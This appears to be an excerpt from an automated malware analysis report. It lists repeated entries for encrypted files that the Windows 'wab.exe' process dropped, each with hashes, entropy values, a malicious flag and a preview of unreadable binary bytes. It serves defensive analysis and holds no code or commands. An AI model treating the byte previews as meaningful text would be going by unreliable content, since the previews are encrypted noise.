                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):190960
                                                                                          Entropy (8bit):7.999250349414211
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LypV8bujGsih30106zVPFK/60N4Se1xGAC8nmp6Bu8V9AtOsGj43YcH:EVIKiapPFK/60NcGAGp6BuSAtOsLr
                                                                                          MD5:F57225D0F62DC931B366F7117D46E2EB
                                                                                          SHA1:CB57A55A0AEBCA41A2908ED1939F03D127F2549A
                                                                                          SHA-256:ADDFC1AED7CE8B0A277872BA1C43A7858A0DD76C983E64D01F9807FA30E1E562
                                                                                          SHA-512:79F0237D2001ED0A304ED66BF0312FD28F8A6C3BB96F0D79DFEB151E2B5142E8446333A0ED839DC6A81B78E36B1A96F5618A6BDB9D165523A343596CC032572B
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):193598
                                                                                          Entropy (8bit):7.999096308292026
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:L0mAjS+P7Jzk7IbNlP/a/+QrQQ6C+p6b9dbEP9RFaHPe3ISqKhtZbcP04c0w7m/m:ohjS+P9k8NlPC/yQ/m6xdbERFemBqMpn
                                                                                          MD5:0E8127DA683715DBD907BCD0880C8BA6
                                                                                          SHA1:F590C26A21413B1333D0F32BEA6328D903B3159D
                                                                                          SHA-256:AEFDCB41ADA8BF8D6BF2901E2983C401927642006654FD0A32DD9C0F4C510782
                                                                                          SHA-512:8904510D562C1A9DC45999C7A9F69F5A5305F7A0D6B6F2382824727A0397B1701AAF28DC0BDFED2842B6F37D8F1449E7F7DE67EACE6B57801206A8DAB2242202
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
